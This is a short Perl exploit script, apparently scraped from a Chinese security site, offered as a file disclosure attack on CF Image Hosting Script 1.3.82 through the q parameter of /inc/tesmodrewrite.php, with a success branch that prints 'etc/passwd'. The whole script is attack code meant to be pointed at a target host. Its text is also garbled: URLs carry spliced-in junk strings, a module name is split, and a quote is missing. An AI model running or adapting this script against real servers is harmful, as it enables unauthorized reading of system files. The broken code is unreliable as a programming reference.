#!/usr/bin/perl
#CF Image Hosting Script 1.3.82 File Disclosure Exploit
#Bugfounder and Exploitcoder: bd0rk
联系方式: HdhCmsTestsohcrew.school-of-hack.net HdhCmsTest2cto测试数据 #eMail: bd0rk[at]hackermail测试数据
影响程序: CF Image Hosting Script 1.3.82
开发者: http://HdhCmsTestphpkode测试数据
下载 地址: http://phpkode测试数据/download/p/CF_Image_Hosting_v1.3.zip
问题代码位于/inc/tesmodrewrite.php 28行
#echo "Current URL: " . $_GET['q'];
#Tested on Ubuntu-Linux
use L WP ::Simple;
use LWP::UserAgent;
sub help()
{
print "Sploit: perl $0 [targethost] /dir/\n";
}
print "\nCF Image Hosting Script 1.3.82 File Disclosure Exploit\n";
print "\ By bd0rk bd0rk[at]hackermail测试数据\n";
($inc, $targethost, $dir, $file,) = @ARGV;
$inc="/inc/";
$file="tesmodrewrite.php?q=[APossibleFile]";
my $url = "http:// HdhCmsTest2cto测试数据 ".$targethost.$dir.$inc.$file;
my $useragent = LWP::UserAgent->new();
my $req = $useragent->get($url,":content_file"=>"[APossibleFile]");
if ($req->is_success)
{
print "$url <= H3h3!\n\n";
print "etc/passwd\n";
exit();
}
else
{
print "Sploit $url Mhhh!\n[!]".$req->status_line.\n";
exit();
}
查看更多关于CF Image Hosting Script 1.3.82文件泄露及修复 - 网站安的详细内容...